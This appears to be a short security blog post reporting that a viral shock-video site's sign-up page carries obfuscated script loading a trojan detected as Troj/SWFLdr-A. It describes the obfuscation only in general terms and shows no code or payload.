…well actually it’s a trojan, but it’s still malicious!
For those who had the misfortune of watching the viral video 2 Girls 1 Cup (SFW Wikipedia link) that spread across the internet like wildfire a couple years ago, people trying to sign up to view the video on the official site will now get more than they bargained for.
As you can see there’s nothing overly complicated about the obfuscation technique, it’s a simple matter of them escaping certain characters, and inserting a symbol at random intervals in the text. After deobfuscating the code, we see another script tag is written which points to the domain where the payload is hosted.
At the time of writing this blog the payload is no longer on the site but we suspect it will reappear sometime in the near future.
Earlier in the week we detected a file at the script target URL as Troj/SWFLdr-A but that file is no longer available.